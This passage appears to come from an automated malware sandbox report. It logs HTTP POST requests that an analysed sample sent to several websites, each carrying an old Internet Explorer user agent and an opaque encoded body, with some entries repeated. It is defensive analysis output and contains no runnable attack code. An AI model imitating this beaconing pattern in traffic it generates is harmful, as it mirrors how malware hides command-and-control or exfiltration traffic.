4c 67 5a 32 58 54 49 33 37 30 74 6f 2f 56 64 4b 79 73 31 4d 6b 4d 50 66 6b 53 30 65 4c 56 2f 59 75 66 63 4c 57 70 37 43 70 49 6c 6a 33 66 78 43 69 61 4d 4e 47 38 52 41 31 43 4c 56 58 61 33 65 65 43 68 71 64 7a 76 7a 6f 36 33 4d 47 57 6d 79 34 32 6e 35 52 5a 51 63 72 49 63 6e 35 76 39 57 35 47 58 4a 4e 42 73 57 32 46 6c 6c 31 39 44 4a 77 39 49 4a 7a 45 34 6a 66 4f 45 76 76 46 50 34 4a 51 45 36 30 55 47 62 4c 4a 4a 61 50 46 52 62 47 70 30 53 44 75 75 4a 65 48 5a 65 78 4e 41 65 39 58 6f 7a 45 6f 6f 58 42 78 77 30 63 4b 56 7a 79 75 62 4d 38 6a 72 74 67 48 61 72 35 6f 67 2b 73 45 41 44 63 2f 59 69 5a 4c 61 34 76 4c 38 2f 76 72 79 57 44 5a 73 45 34 37 74 71 36 44 2b 6f 4a 74 4d 72 51 58 67 4b 5a 42 59 75 63 68 32 51 32 75 2b 63 33 75 75 45 6f 55 57 68 54 52 59 54 75 58 45 33 6d 57 61 70 73 6d 59 48 5a 72 46 4b 6b 64 74 4d 54 46 4b 44 31 4f 4e 68 37 50 49 4f 39 64 2b 5a 67 3d 3d Data Ascii: GEbc8H8stWXfHzVvXs/D7ggvsKzVujOZI4TFQIF1UnQycC/CdGQ2GI9nFicAR8NxEK/Ksh4pfslmYdwsPg65kl1Az4NwiwZA33X23CS4pF1CKHYs1kUfZmWGuEo9dZstroRhw9XirMwg5Xz8JH5SE24z0Vo9XHtIHu/JzLaH4TUtGuew2hwFcVxt5D1zz19Xt5HN0d538GZny0IDIF7FmveXHbPaEELMdAjjDumcJDG/QzWcPCwKMO90JuCMKnxLBEeYM8g4CTzteLgZ2XTI370to/VdKys1MkMPfkS0eLV/YufcLWp7CpIlj3fxCiaMNG8RA1CLVXa3eeChqdzvzo63MGWmy42n5RZQcrIcn5v9W5GXJNBsW2Fll19DJw9IJzE4jfOEvvFP4JQE60UGbLJJaPFRbGp0SDuuJeHZexNAe9XozEooXBxw0cKVzyubM8jrtgHar5og+sEADc/YiZLa4vL8/vryWDZsE47tq6D+oJtMrQXgKZBYuch2Q2u+c3uuEoUWhTRYTuXE3mWapsmYHZrFKkdtMTFKD1ONh7PIO9d+Zg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 47 45 62 63 38 48 38 73 74 57 58 66 48 7a 56 76 58 73 2f 44 37 67 67 76 73 4b 7a 56 75 6a 4f 5a 49 34 54 46 51 49 46 31 55 6e 51 79 63 43 2f 43 64 47 51 32 47 49 39 6e 46 69 63 41 52 38 4e 78 45 4b 2f 4b 73 68 34 70 66 73 6c 6d 59 64 77 73 50 67 36 35 6b 6c 31 41 7a 34 4e 77 69 77 5a 41 33 33 58 32 33 43 53 34 70 46 31 43 4b 48 59 73 31 6b 55 66 5a 6d 57 47 75 45 6f 39 64 5a 73 74 72 6f 52 68 77 39 58 69 72 4d 77 67 35 58 7a 38 4a 48 35 53 45 32 34 7a 30 56 6f 39 58 48 74 49 48 75 2f 4a 7a 4c 61 48 34 54 55 74 47 75 65 77 32 68 77 46 63 56 78 74 35 44 31 7a 7a 31 39 58 74 35 48 4e 30 64 35 33 38 47 5a 6e 79 30 49 44 49 46 37 46 6d 76 65 58 48 62 50 61 45 45 4c 4d 64 41 6a 6a 44 75 6d 63 4a 44 47 2f 51 7a 57 63 50 43 77 4b 4d 4f 39 30 4a 75 43 4d 4b 6e 78 4c 42 45 65 59 4d 38 67 34 43 54 7a 74 65 4c 67 5a 32 58 54 49 33 37 30 74 6f 2f 56 64 4b 79 73 31 4d 6b 4d 50 66 6b 53 30 65 4c 56 2f 59 75 66 63 4c 57 70 37 43 70 49 6c 6a 33 66 78 43 69 61 4d 4e 47 38 52 41 31 43 4c 56 58 61 33 65 65 43 68 71 64 7a 76 7a 6f 36 33 4d 47 57 6d 79 34 32 6e 35 52 5a 51 63 72 49 63 6e 35 76 39 57 35 47 58 4a 4e 42 73 57 32 46 6c 6c 31 39 44 4a 77 39 49 4a 7a 45 34 6a 66 4f 45 76 76 46 50 34 4a 51 45 36 30 55 47 62 4c 4a 4a 61 50 46 52 62 47 70 30 53 44 75 75 4a 65 48 5a 65 78 4e 41 65 39 58 6f 7a 45 6f 6f 58 42 78 77 30 63 4b 56 7a 79 75 62 4d 38 6a 72 74 67 48 61 72 35 6f 67 2b 73 45 41 44 63 2f 59 69 5a 4c 61 34 76 4c 38 2f 76 72 79 57 44 5a 73 45 34 37 74 71 36 44 2b 6f 4a 74 4d 72 51 58 67 4b 5a 42 59 75 63 68 32 51 32 75 2b 63 33 75 75 45 6f 55 57 68 54 52 59 54 75 58 45 33 6d 57 61 70 73 6d 59 48 5a 72 46 4b 6b 64 74 4d 54 46 4b 44 31 4f 4e 68 37 50 49 4f 39 64 2b 5a 67 3d 3d Data Ascii: GEbc8H8stWXfHzVvXs/D7ggvsKzVujOZI4TFQIF1UnQycC/CdGQ2GI9nFicAR8NxEK/Ksh4pfslmYdwsPg65kl1Az4NwiwZA33X23CS4pF1CKHYs1kUfZmWGuEo9dZstroRhw9XirMwg5Xz8JH5SE24z0Vo9XHtIHu/JzLaH4TUtGuew2hwFcVxt5D1zz19Xt5HN0d538GZny0IDIF7FmveXHbPaEELMdAjjDumcJDG/QzWcPCwKMO90JuCMKnxLBEeYM8g4CTzteLgZ2XTI370to/VdKys1MkMPfkS0eLV/YufcLWp7CpIlj3fxCiaMNG8RA1CLVXa3eeChqdzvzo63MGWmy42n5RZQcrIcn5v9W5GXJNBsW2Fll19DJw9IJzE4jfOEvvFP4JQE60UGbLJJaPFRbGp0SDuuJeHZexNAe9XozEooXBxw0cKVzyubM8jrtgHar5og+sEADc/YiZLa4vL8/vryWDZsE47tq6D+oJtMrQXgKZBYuch2Q2u+c3uuEoUWhTRYTuXE3mWapsmYHZrFKkdtMTFKD1ONh7PIO9d+Zg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 56 49 2b 5a 65 43 33 6c 77 57 58 43 65 32 57 43 4a 49 54 38 43 65 61 64 68 45 38 62 64 48 43 37 73 52 6a 63 4b 75 58 36 2b 36 59 78 4e 32 55 31 35 54 33 4b 61 2f 57 73 32 59 61 33 55 4e 52 64 78 57 69 4c 2f 42 61 6c 64 2f 31 76 63 2b 68 2f 6d 50 4c 75 73 4d 30 4e 57 78 45 4d 34 78 79 47 4b 74 64 48 2b 4a 70 35 70 45 57 54 71 44 6f 33 58 37 31 48 6d 71 52 47 6c 37 43 4d 4e 6d 4d 53 69 77 62 48 59 53 67 32 58 74 66 41 7a 39 61 72 70 35 6c 78 51 48 42 52 33 34 4a 59 58 78 78 52 31 61 78 4f 4c 76 6c 6c 44 55 70 46 78 47 46 52 66 61 53 59 55 52 65 6b 47 59 69 78 6f 33 75 38 53 64 6c 77 43 6a 42 33 41 4a 43 4f 75 37 51 4e 4b 71 75 73 34 70 4d 34 42 75 52 56 2b 50 42 4e 48 5a 79 37 42 53 67 43 62 6b 75 48 6f 31 70 30 78 64 6f 76 32 72 48 71 4d 50 43 44 67 34 79 78 48 35 6f 6b 38 7a 6a 79 4c 42 41 6d 46 2b 33 2b 4c 56 75 72 56 76 61 58 4e 38 76 66 59 2f 4b 30 36 5a 75 34 75 76 50 2b 68 5a 45 57 4e 4f 2b 6e 75 45 47 59 4c 4d 69 48 50 72 4c 76 6a 41 44 2b 62 6b 2b 36 6b 2b 54 53 64 74 6f 6b 55 6a 63 74 50 30 30 34 77 4a 6a 68 44 30 46 6b 62 59 4d 6d 59 6c 54 66 42 68 43 78 4c 34 32 33 42 66 65 39 46 79 31 55 48 31 38 75 59 35 6e 4e 4c 6c 37 49 32 55 35 7a 77 38 46 73 75 77 53 44 57 7a 51 59 64 7a 55 49 6b 59 45 55 56 63 57 77 39 4d 6a 4c 62 73 46 2b 67 6a 41 4a 5a 36 68 44 49 51 44 6c 61 72 44 73 56 69 57 37 5a 6d 4d 6a 74 53 42 75 68 41 68 64 32 59 52 6b 4e 79 2b 58 64 32 73 59 4f 34 4f 6c 73 52 7a 66 50 6b 32 52 69 72 4b 6c 67 72 51 71 32 43 70 61 41 61 70 34 6d 59 57 56 71 78 67 61 6d 34 6f 77 68 47 54 4e 54 45 4a 55 62 67 49 72 63 70 46 31 52 56 71 55 39 52 50 31 4d 72 32 75 47 6f 76 4e 36 56 56 6d 65 4c 51 70 43 41 3d 3d Data Ascii: VI+ZeC3lwWXCe2WCJIT8CeadhE8bdHC7sRjcKuX6+6YxN2U15T3Ka/Ws2Ya3UNRdxWiL/Bald/1vc+h/mPLusM0NWxEM4xyGKtdH+Jp5pEWTqDo3X71HmqRGl7CMNmMSiwbHYSg2XtfAz9arp5lxQHBR34JYXxxR1axOLvllDUpFxGFRfaSYURekGYixo3u8SdlwCjB3AJCOu7QNKqus4pM4BuRV+PBNHZy7BSgCbkuHo1p0xdov2rHqMPCDg4yxH5ok8zjyLBAmF+3+LVurVvaXN8vfY/K06Zu4uvP+hZEWNO+nuEGYLMiHPrLvjAD+bk+6k+TSdtokUjctP004wJjhD0FkbYMmYlTfBhCxL423Bfe9Fy1UH18uY5nNLl7I2U5zw8FsuwSDWzQYdzUIkYEUVcWw9MjLbsF+gjAJZ6hDIQDlarDsViW7ZmMjtSBuhAhd2YRkNy+Xd2sYO4OlsRzfPk2RirKlgrQq2CpaAap4mYWVqxgam4owhGTNTEJUbgIrcpF1RVqU9RP1Mr2uGovN6VVmeLQpCA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 79 4f 45 62 65 77 6a 36 77 57 58 6b 6f 62 63 69 53 39 57 76 47 33 73 61 2b 5a 4f 51 70 62 39 6a 76 49 30 39 7a 44 61 56 57 76 38 67 63 46 2f 68 35 55 66 38 30 41 2b 6d 67 48 47 36 54 4c 44 35 63 6a 64 73 55 30 6d 30 6e 56 4e 5a 44 47 77 64 6e 5a 4e 48 32 33 41 56 39 33 34 5a 78 6c 73 30 65 45 45 2f 66 73 34 44 42 75 63 65 48 74 79 41 52 63 58 59 52 34 35 39 51 78 73 2f 56 4d 38 6a 32 79 74 6f 42 7a 39 79 72 50 67 34 7a 73 65 71 6a 61 6a 58 51 48 7a 45 57 48 6d 71 55 57 6a 67 45 33 33 56 4e 4d 69 41 70 74 4a 6a 4c 64 65 75 54 6b 54 64 37 6f 51 2b 69 4f 58 46 72 74 72 4e 47 33 32 6f 72 61 65 4b 4f 6d 73 56 56 42 47 70 78 32 44 34 63 69 76 76 72 56 6c 46 6b 52 59 38 51 49 45 67 70 50 4c 68 41 6a 72 39 67 43 4a 71 55 70 73 51 48 49 42 6c 48 47 30 6b 4a 53 75 36 59 36 67 72 77 62 41 67 7a 79 68 6d 71 5a 46 55 52 66 6b 76 4b 70 62 30 44 64 74 4b 61 4c 4e 31 49 4d 69 55 4a 4d 6b 31 4c 62 42 59 2b 77 66 41 52 78 6e 4d 33 53 32 79 47 30 6f 2f 5a 32 62 36 53 6e 44 6b 51 53 6c 63 47 2b 55 7a 54 4f 75 33 4e 31 49 48 52 79 6b 59 4b 5a 51 36 57 46 45 43 4a 6f 72 4b 4c 66 73 5a 67 41 63 65 56 70 37 4d 55 46 4d 49 65 32 53 37 56 6d 53 76 6d 59 4d 2f 71 2b 54 72 44 41 71 2b 51 56 43 55 4c 57 2b 6b 56 67 6c 45 41 52 46 2f 4e 69 46 30 34 4d 4b 6b 44 37 72 77 59 50 47 41 75 75 41 7a 69 7a 67 6b 36 38 7a 4e 45 52 42 52 43 45 7a 44 41 34 78 66 30 6c 45 43 53 4b 55 33 57 78 30 72 46 42 75 6f 57 55 48 74 65 4f 6b 63 63 76 4a 50 52 4d 33 41 53 62 69 6f 48 50 33 6b 4a 68 6d 4d 39 55 6a 71 49 53 44 42 61 41 43 5a 57 56 69 44 6a 54 38 67 6c 69 4e 71 52 74 53 67 30 49 48 63 56 42 63 52 46 43 33 56 37 45 49 6b 4c 54 31 70 55 4f 57 61 6f 79 45 64 Data Ascii: yOEbewj6wWXkobciS9WvG3sa+ZOQpb9jvI09zDaVWv8gcF/h5Uf80A+mgHG6TLD5cjdsU0m0nVNZDGwdnZNH23AV934Zxls0eEE/fs4DBuceHtyARcXYR459Qxs/VM8j2ytoBz9yrPg4zseqjajXQHzEWHmqUWjgE33VNMiAptJjLdeuTkTd7oQ+iOXFrtrNG32oraeKOmsVVBGpx2D4civvrVlFkRY8QIEgpPLhAjr9gCJqUpsQHIBlHG0kJSu6Y6grwbAgzyhmqZFURfkvKpb0DdtKaLN1IMiUJMk1LbBY+wfARxnM3S2yG0o/Z2b6SnDkQSlcG+UzTOu3N1IHRykYKZQ6WFECJorKLfsZgAceVp7MUFMIe2S7VmSvmYM/q+TrDAq+QVCULW+kVglEARF/NiF04MKkD7rwYPGAuuAzizgk68zNERBRCEzDA4xf0lECSKU3Wx0rFBuoWUHteOkccvJPRM3ASbioHP3kJhmM9UjqISDBaACZWViDjT8gliNqRtSg0IHcVBcRFC3V7EIkLT1pUOWaoyEd
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheData Raw: 4a 41 45 53 6b 56 35 67 75 6d 57 39 41 47 43 6e 71 55 78 35 45 6b 47 4e 69 2f 43 65 30 64 67 4c 63 68 37 73 55 49 6e 41 62 54 69 62 58 36 34 46 63 31 63 30 77 63 4a 56 62 43 6a 4f 48 6f 44 6d 74 2b 69 49 48 74 54 71 47 51 37 68 52 6b 37 39 61 46 54 58 50 46 54 65 46 43 69 6a 48 63 49 37 7a 38 43 4f 74 58 41 67 4f 35 4e 76 4e 46 49 66 70 55 53 74 62 32 6a 56 42 38 59 35 6c 6d 74 4b 6d 79 50 42 36 74 36 42 44 2b 55 5a 6f 45 4a 4d 45 66 68 37 2b 44 63 79 6f 75 77 61 46 34 37 79 45 4c 7a 77 2f 71 4c 37 6e 63 71 36 6a 54 46 54 79 53 4c 34 32 74 37 6a 7a 55 47 4b 6c 63 31 31 61 46 35 35 46 57 37 2f 45 6e 6a 31 30 53 2f 51 4e 2b 55 37 41 50 49 65 48 69 32 64 58 7a 4d 30 6a 35 6a 54 44 65 4b 73 43 4d 31 65 62 66 70 58 76 41 50 4a 4f 7a 6e 74 6c 67 6f 64 77 6d 2f 72 6f 4a 77 76 48 67 77 47 6f 41 76 30 77 62 57 42 69 77 2f 36 6a 42 2f 51 56 73 4d 59 61 49 47 68 51 41 31 4f 46 6b 70 2f 78 65 4d 31 52 4c 2b 65 63 33 78 6c 50 4e 69 47 30 45 6b 59 69 65 49 64 6f 4a 36 38 63 68 53 75 69 41 70 70 31 35 34 72 33 52 55 5a 51 4e 68 47 6f 61 5a 4f 74 34 33 52 38 63 47 46 78 39 38 50 4e 36 37 77 6f 7a 45 46 41 61 38 47 66 33 31 72 77 58 61 70 66 46 77 35 36 6e 54 71 41 46 73 76 62 53 6f 4b 47 68 64 41 5a 64 41 69 6a 34 53 69 36 76 70 58 32 70 53 78 6a 31 78 63 48 4c 47 63 68 4a 4b 73 6a 77 4c 52 43 73 55 2b 79 52 42 45 4e 53 7a 36 58 2b 64 71 72 67 70 79 47 55 69 35 32 65 42 43 78 46 44 42 43 31 45 71 78 56 4e 77 75 62 73 37 4e 6a 58 4d 2b 52 68 61 59 56 5a 37 31 76 5a 64 63 4d 2f 73 70 2b 4b 78 42 78 6a 53 6c 42 76 36 39 32 31 49 6b 41 48 74 71 74 70 2f 48 47 55 52 48 4a 41 4c 62 50 35 36 54 45 68 2f 47 67 3d 3d Data Ascii: JAESkV5gumW9AGCnqUx5EkGNi/Ce0dgLch7sUInAbTibX64Fc1c0wcJVbCjOHoDmt+iIHtTqGQ7hRk79aFTXPFTeFCijHcI7z8COtXAgO5NvNFIfpUStb2jVB8Y5lmtKmyPB6t6BD+UZoEJMEfh7+DcyouwaF47yELzw/qL7ncq6jTFTySL42t7jzUGKlc11aF55FW7/Enj10S/QN+U7APIeHi2dXzM0j5jTDeKsCM1ebfpXvAPJOzntlgodwm/roJwvHgwGoAv0wbWBiw/6jB/QVsMYaIGhQA1OFkp/xeM1RL+ec3xlPNiG0EkYieIdoJ68chSuiApp154r3RUZQNhGoaZOt43R8cGFx98PN67wozEFAa8Gf31rwXapfFw56nTqAFsvbSoKGhdAZdAij4Si6vpX2pSxj1xcHLGchJKsjwLRCsU+yRBENSz6X+dqrgpyGUi52eBCxFDBC1EqxVNwubs7NjXM+RhaYVZ71vZdcM/sp+KxBxjSlBv6921IkAHtqtp/HGURHJALbP56TEh/Gg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 79 4f 45 62 65 77 6a 36 77 57 58 6b 6f 62 63 69 53 39 57 76 47 33 73 61 2b 5a 4f 51 70 62 39 6a 76 49 30 39 7a 44 61 56 57 76 38 67 63 46 2f 68 35 55 66 38 30 41 2b 6d 67 48 47 36 54 4c 44 35 63 6a 64 73 55 30 6d 30 6e 56 4e 5a 44 47 77 64 6e 5a 4e 48 32 33 41 56 39 33 34 5a 78 6c 73 30 65 45 45 2f 66 73 34 44 42 75 63 65 48 74 79 41 52 63 58 59 52 34 35 39 51 78 73 2f 56 4d 38 6a 32 79 74 6f 42 7a 39 79 72 50 67 34 7a 73 65 71 6a 61 6a 58 51 48 7a 45 57 48 6d 71 55 57 6a 67 45 33 33 56 4e 4d 69 41 70 74 4a 6a 4c 64 65 75 54 6b 54 64 37 6f 51 2b 69 4f 58 46 72 74 72 4e 47 33 32 6f 72 61 65 4b 4f 6d 73 56 56 42 47 70 78 32 44 34 63 69 76 76 72 56 6c 46 6b 52 59 38 51 49 45 67 70 50 4c 68 41 6a 72 39 67 43 4a 71 55 70 73 51 48 49 42 6c 48 47 30 6b 4a 53 75 36 59 36 67 72 77 62 41 67 7a 79 68 6d 71 5a 46 55 52 66 6b 76 4b 70 62 30 44 64 74 4b 61 4c 4e 31 49 4d 69 55 4a 4d 6b 31 4c 62 42 59 2b 77 66 41 52 78 6e 4d 33 53 32 79 47 30 6f 2f 5a 32 62 36 53 6e 44 6b 51 53 6c 63 47 2b 55 7a 54 4f 75 33 4e 31 49 48 52 79 6b 59 4b 5a 51 36 57 46 45 43 4a 6f 72 4b 4c 66 73 5a 67 41 63 65 56 70 37 4d 55 46 4d 49 65 32 53 37 56 6d 53 76 6d 59 4d 2f 71 2b 54 72 44 41 71 2b 51 56 43 55 4c 57 2b 6b 56 67 6c 45 41 52 46 2f 4e 69 46 30 34 4d 4b 6b 44 37 72 77 59 50 47 41 75 75 41 7a 69 7a 67 6b 36 38 7a 4e 45 52 42 52 43 45 7a 44 41 34 78 66 30 6c 45 43 53 4b 55 33 57 78 30 72 46 42 75 6f 57 55 48 74 65 4f 6b 63 63 76 4a 50 52 4d 33 41 53 62 69 6f 48 50 33 6b 4a 68 6d 4d 39 55 6a 71 49 53 44 42 61 41 43 5a 57 56 69 44 6a 54 38 67 6c 69 4e 71 52 74 53 67 30 49 48 63 56 42 63 52 46 43 33 56 37 45 49 6b 4c 54 31 70 55 4f 57 61 6f 79 45 64 Data Ascii: yOEbewj6wWXkobciS9WvG3sa+ZOQpb9jvI09zDaVWv8gcF/h5Uf80A+mgHG6TLD5cjdsU0m0nVNZDGwdnZNH23AV934Zxls0eEE/fs4DBuceHtyARcXYR459Qxs/VM8j2ytoBz9yrPg4zseqjajXQHzEWHmqUWjgE33VNMiAptJjLdeuTkTd7oQ+iOXFrtrNG32oraeKOmsVVBGpx2D4civvrVlFkRY8QIEgpPLhAjr9gCJqUpsQHIBlHG0kJSu6Y6grwbAgzyhmqZFURfkvKpb0DdtKaLN1IMiUJMk1LbBY+wfARxnM3S2yG0o/Z2b6SnDkQSlcG+UzTOu3N1IHRykYKZQ6WFECJorKLfsZgAceVp7MUFMIe2S7VmSvmYM/q+TrDAq+QVCULW+kVglEARF/NiF04MKkD7rwYPGAuuAzizgk68zNERBRCEzDA4xf0lECSKU3Wx0rFBuoWUHteOkccvJPRM3ASbioHP3kJhmM9UjqISDBaACZWViDjT8gliNqRtSg0IHcVBcRFC3V7EIkLT1pUOWaoyEd
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 48 72 54 4a 34 34 65 77 7a 57 55 67 64 6a 70 73 74 72 52 6c 6d 56 41 30 45 69 5a 39 6b 2b 69 36 71 34 53 54 48 64 75 30 4b 6b 62 72 77 31 55 75 36 61 6f 6a 57 49 46 52 45 79 32 38 37 66 38 55 4f 30 63 44 2f 69 6f 6b 70 54 4b 37 4e 47 42 30 77 36 4a 2f 5a 55 6b 2f 62 54 56 53 42 73 67 34 4b 48 42 68 68 59 2f 54 2f 66 61 58 37 4f 59 46 61 50 50 43 72 6a 4b 37 68 2b 43 6c 66 62 5a 76 6e 4b 5a 66 66 63 62 52 51 77 45 2b 33 68 4e 65 65 71 2b 6d 75 69 47 43 53 4a 73 73 70 77 51 4c 74 34 6d 33 47 4f 55 38 36 63 72 36 30 33 41 76 71 4f 77 65 44 54 58 72 57 61 49 79 33 65 36 70 64 43 69 2b 73 78 78 58 74 72 73 74 63 41 43 67 48 46 58 6f 63 2f 2b 71 4d 75 53 71 30 52 4a 79 6d 4e 41 4d 47 58 31 34 50 72 53 79 77 61 69 45 66 77 4b 41 4e 52 53 34 4a 6a 4e 57 49 73 59 50 4d 71 7a 2b 64 76 57 57 37 79 49 61 78 57 72 5a 37 4e 53 5a 4b 6e 2b 32 55 75 41 58 2b 50 48 49 56 36 67 79 72 77 5a 55 52 6a 6b 57 57 68 61 42 52 61 71 53 46 47 68 58 65 36 63 44 38 2f 2b 4a 2b 43 41 31 57 46 42 6e 74 77 56 75 33 70 78 63 75 42 39 2f 30 78 6f 58 4d 63 4c 74 34 30 48 31 31 42 41 79 66 4e 73 74 65 50 4d 52 64 61 4e 78 71 52 33 49 58 6d 36 75 32 51 4b 41 6b 41 33 4f 4c 37 4e 70 55 74 69 37 64 51 4f 48 4a 66 6c 58 38 39 6e 76 50 33 4d 52 57 53 52 63 33 76 77 4d 63 6e 73 39 67 57 49 63 45 48 6f 42 38 59 34 6e 72 30 6e 62 4e 51 35 46 4d 4a 76 75 77 65 50 50 37 41 39 44 72 38 37 67 57 72 37 55 49 36 46 30 66 77 59 70 4c 50 71 64 43 41 64 70 4c 65 66 30 57 75 39 69 47 33 59 55 75 58 7a 75 68 5a 61 32 55 4d 52 54 5a 73 4a 31 7a 5a 6c 42 35 69 36 4f 4b 4c 2b 62 57 6e 59 6d 4a 42 31 46 71 71 57 36 65 30 6b 49 71 4d 49 56 58 67 7a 63 78 32 46 34 54 41 3d 3d Data Ascii: HrTJ44ewzWUgdjpstrRlmVA0EiZ9k+i6q4STHdu0Kkbrw1Uu6aojWIFREy287f8UO0cD/iokpTK7NGB0w6J/ZUk/bTVSBsg4KHBhhY/T/faX7OYFaPPCrjK7h+ClfbZvnKZffcbRQwE+3hNeeq+muiGCSJsspwQLt4m3GOU86cr603AvqOweDTXrWaIy3e6pdCi+sxxXtrstcACgHFXoc/+qMuSq0RJymNAMGX14PrSywaiEfwKANRS4JjNWIsYPMqz+dvWW7yIaxWrZ7NSZKn+2UuAX+PHIV6gyrwZURjkWWhaBRaqSFGhXe6cD8/+J+CA1WFBntwVu3pxcuB9/0xoXMcLt40H11BAyfNstePMRdaNxqR3IXm6u2QKAkA3OL7NpUti7dQOHJflX89nvP3MRWSRc3vwMcns9gWIcEHoB8Y4nr0nbNQ5FMJvuwePP7A9Dr87gWr7UI6F0fwYpLPqdCAdpLef0Wu9iG3YUuXzuhZa2UMRTZsJ1zZlB5i6OKL+bWnYmJB1FqqW6e0kIqMIVXgzcx2F4TA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 48 72 54 4a 34 34 65 77 7a 57 55 67 64 6a 70 73 74 72 52 6c 6d 56 41 30 45 69 5a 39 6b 2b 69 36 71 34 53 54 48 64 75 30 4b 6b 62 72 77 31 55 75 36 61 6f 6a 57 49 46 52 45 79 32 38 37 66 38 55 4f 30 63 44 2f 69 6f 6b 70 54 4b 37 4e 47 42 30 77 36 4a 2f 5a 55 6b 2f 62 54 56 53 42 73 67 34 4b 48 42 68 68 59 2f 54 2f 66 61 58 37 4f 59 46 61 50 50 43 72 6a 4b 37 68 2b 43 6c 66 62 5a 76 6e 4b 5a 66 66 63 62 52 51 77 45 2b 33 68 4e 65 65 71 2b 6d 75 69 47 43 53 4a 73 73 70 77 51 4c 74 34 6d 33 47 4f 55 38 36 63 72 36 30 33 41 76 71 4f 77 65 44 54 58 72 57 61 49 79 33 65 36 70 64 43 69 2b 73 78 78 58 74 72 73 74 63 41 43 67 48 46 58 6f 63 2f 2b 71 4d 75 53 71 30 52 4a 79 6d 4e 41 4d 47 58 31 34 50 72 53 79 77 61 69 45 66 77 4b 41 4e 52 53 34 4a 6a 4e 57 49 73 59 50 4d 71 7a 2b 64 76 57 57 37 79 49 61 78 57 72 5a 37 4e 53 5a 4b 6e 2b 32 55 75 41 58 2b 50 48 49 56 36 67 79 72 77 5a 55 52 6a 6b 57 57 68 61 42 52 61 71 53 46 47 68 58 65 36 63 44 38 2f 2b 4a 2b 43 41 31 57 46 42 6e 74 77 56 75 33 70 78 63 75 42 39 2f 30 78 6f 58 4d 63 4c 74 34 30 48 31 31 42 41 79 66 4e 73 74 65 50 4d 52 64 61 4e 78 71 52 33 49 58 6d 36 75 32 51 4b 41 6b 41 33 4f 4c 37 4e 70 55 74 69 37 64 51 4f 48 4a 66 6c 58 38 39 6e 76 50 33 4d 52 57 53 52 63 33 76 77 4d 63 6e 73 39 67 57 49 63 45 48 6f 42 38 59 34 6e 72 30 6e 62 4e 51 35 46 4d 4a 76 75 77 65 50 50 37 41 39 44 72 38 37 67 57 72 37 55 49 36 46 30 66 77 59 70 4c 50 71 64 43 41 64 70 4c 65 66 30 57 75 39 69 47 33 59 55 75 58 7a 75 68 5a 61 32 55 4d 52 54 5a 73 4a 31 7a 5a 6c 42 35 69 36 4f 4b 4c 2b 62 57 6e 59 6d 4a 42 31 46 71 71 57 36 65 30 6b 49 71 4d 49 56 58 67 7a 63 78 32 46 34 54 41 3d 3d Data Ascii: HrTJ44ewzWUgdjpstrRlmVA0EiZ9k+i6q4STHdu0Kkbrw1Uu6aojWIFREy287f8UO0cD/iokpTK7NGB0w6J/ZUk/bTVSBsg4KHBhhY/T/faX7OYFaPPCrjK7h+ClfbZvnKZffcbRQwE+3hNeeq+muiGCSJsspwQLt4m3GOU86cr603AvqOweDTXrWaIy3e6pdCi+sxxXtrstcACgHFXoc/+qMuSq0RJymNAMGX14PrSywaiEfwKANRS4JjNWIsYPMqz+dvWW7yIaxWrZ7NSZKn+2UuAX+PHIV6gyrwZURjkWWhaBRaqSFGhXe6cD8/+J+CA1WFBntwVu3pxcuB9/0xoXMcLt40H11BAyfNstePMRdaNxqR3IXm6u2QKAkA3OL7NpUti7dQOHJflX89nvP3MRWSRc3vwMcns9gWIcEHoB8Y4nr0nbNQ5FMJvuwePP7A9Dr87gWr7UI6F0fwYpLPqdCAdpLef0Wu9iG3YUuXzuhZa2UMRTZsJ1zZlB5i6OKL+bWnYmJB1FqqW6e0kIqMIVXgzcx2F4TA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vitaindu.comCache-Control: no-cacheData Raw: 44 50 74 58 4a 71 6b 48 68 57 55 46 78 42 5a 4e 65 4b 79 2b 4a 4d 4c 78 32 76 5a 48 62 72 6a 51 37 59 77 64 78 56 51 66 46 51 4c 6d 39 64 45 67 73 78 73 6f 6c 48 41 6b 56 69 6b 45 4b 59 66 48 71 59 4f 54 6c 51 54 4d 4e 6e 6f 4f 32 69 58 42 74 62 6c 30 6f 49 6b 41 6f 34 65 36 49 6e 72 30 77 49 4c 65 32 67 73 62 4c 65 7a 6f 46 78 37 31 30 74 77 76 74 77 56 49 6a 61 6c 74 68 76 38 62 6d 6b 58 64 38 4c 48 55 78 34 70 6e 31 54 37 7a 4a 69 44 44 78 45 6d 35 61 78 65 6f 46 57 55 5a 59 65 74 37 49 65 71 7a 38 4c 6f 38 